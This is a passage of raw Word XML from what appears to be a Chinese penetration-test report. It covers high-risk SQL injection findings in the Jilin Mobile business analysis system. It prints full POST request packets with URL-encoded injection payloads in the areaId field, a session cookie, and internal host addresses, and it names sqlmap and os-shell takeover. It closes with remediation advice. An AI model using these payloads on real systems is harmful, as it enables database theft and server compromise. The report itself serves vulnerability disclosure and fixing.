        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>截图3：接口http://10.255.133.186:8888/portal/pages/frame/portal/home/homeAction.jsp?eaction=cityList   存在SQL注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE782B4" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="1FAB9630" wp14:editId="14AD658A">
            <wp:extent cx="5267960" cy="2991485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0105" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia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截图4：SQLMAP验证,同类型漏洞后续不再使用SQLMAP验证</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C9D730" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00956221">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27511306" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto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5B1D1827" wp14:editId="063472C7">
            <wp:extent cx="5269865" cy="2795270"/>
            <wp:effectExtent l="0" t="0" r="698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EEE1" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto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相关数据包如下：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221" w14:paraId="006430AF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4CE2E9D5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SQL注入漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="38315DC8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POST /portal/pages/frame/portal/home/homeAction.jsp?eaction=cityList HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58E78D7C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Host: 10.255.133.186:8888</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="462BA0FE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User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12CC0D0A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Content-Length: 94</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="391CE72A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Accept: */*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24DD0862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Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E974E13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Content-Type: application/x-www-form-urlencoded; charset=UTF-8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D9B0AC4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lastRenderedPageBreak/>
              <w:t>Cookie: JSESSIONID=77AFA9613C66F34F328BC82100E4D7F5.portal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FF8CF34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Origin: http://10.255.133.186:8888</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6731DB19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Referer: http://10.255.133.186:8888/portal//pages/portal/home/home.jsp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EAF4CC8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Sec-Gpc: 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26219AC8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X-Requested-With: XMLHttpRequest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="723BA386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Accept-Encoding: gzip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74FD46B6" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00956221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</w:p>
          <w:p w14:paraId="338E97D9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areaId=0000%2F%2A%2A%2Fand%2F%2A%2A%2Fcast%28md5%28%271474358703%27%29as%2F%2A%2A%2Fint%29%3E0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1EAC5CAD" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00956221">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="556C2E0B" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>程度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b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="322F3204" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：攻击者可以利用该漏洞对获取数据库的敏感信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>甚至通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>os-shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>拿到服务器权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="579E8B02" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb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>整改建议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:bookmarkEnd w:id="1"/>
    <w:bookmarkEnd w:id="2"/>
    <w:p w14:paraId="7847B778" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>使用预编译语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72567E70" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>检查数据类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3D74A9" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>使用安全函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB17FD6" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00956221">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57822C1A" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="3"/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>吉林移动-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>经营分析系统</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SQL注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E2C8EC" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>问题描述</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>发现吉林移动-经营分析系统存在SQL注入漏洞。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1242D9A8" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A4C64B" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="af7"/>
            <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
          </w:rPr>
          <w:t>http://10.255.133.186:8888/portal/pages/frame/portal/home/homeAction.jsp?eaction=getKpiDataInfo</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3157F0EE" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia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  <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试过程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C2B175" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto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测试发现吉林经营分析系统存在SQL注入漏洞，可在4A登录后进行测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691E848F" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>截图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>及说明</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D03E7C" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto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截图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：打开http://10.255.133.186:8888/portal/pages/portal/home/home.jsp,接口自动发送post请求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FA0167" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto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114300" distR="114300" wp14:anchorId="2523F145" wp14:editId="6EEBA7A6">
            <wp:extent cx="5266690" cy="2935605"/>
            <wp:effectExtent l="0" t="0" r="635" b="762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4848B" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00956221">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="592D7DD8" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>截图2：SQL注入漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4141ADE5" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00956221">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FB90FA6" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="0000FF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="618B855C" wp14:editId="40881694">
            <wp:extent cx="5272405" cy="2959735"/>
            <wp:effectExtent l="0" t="0" r="4445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BC35" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto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相关数据包如下：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221" w14:paraId="372B57B6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8522" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61BD1F2F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SQL注入漏洞</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F62376D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POST /portal/pages/frame/portal/home/homeAction.jsp?eaction=getKpiDataInfo HTTP/1.1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65F512E8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Host: 10.255.133.186:8888</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05E344F9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User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AD9AD24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Content-Length: 132</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0BD4301F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Accept: */*</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6646DA6B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Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47362DD0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Content-Type: application/x-www-form-urlencoded; charset=UTF-8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="04885078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lastRenderedPageBreak/>
              <w:t>Cookie: JSESSIONID=77AFA9613C66F34F328BC82100E4D7F5.portal</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C83BF24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Origin: http://10.255.133.186:8888</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6548C714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Referer: http://10.255.133.186:8888/portal//pages/portal/home/home.jsp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="340A45F9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Sec-Gpc: 1</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="092B3707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X-Requested-With: XMLHttpRequest</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="59EACBA7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Accept-Encoding: gzip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F93A3C8" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00956221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</w:p>
          <w:p w14:paraId="7DFEE886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areaId=9999%27and%28select%271%27from%2F%2A%2A%2Fcast%28md5%281994831893%29as%2F%2A%2A%2Fint%29%29%3E%270&amp;cityId=9999&amp;dayId=20250424</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14D0C4DA" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00956221">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="281C899B" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:hint="eastAsia"/>
          <w:b/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>程度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b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D7D1CD" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：攻击者可以利用该漏洞对获取数据库的敏感信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>甚至通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>os-shell</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>拿到服务器权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1798A527" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb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>整改建议</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5604906C" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1.使用预编译语句。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0825757A" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2.检查数据类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20186E90" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="2"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>3.使用安全函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6456485A" w14:textId="77777777" w:rsidR="00956221" w:rsidRDefault="00956221">
      <w:pPr>
        <w:pStyle w:val="afb"/>
        <w:spacing w:after="156"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:kern w:val="2"/>
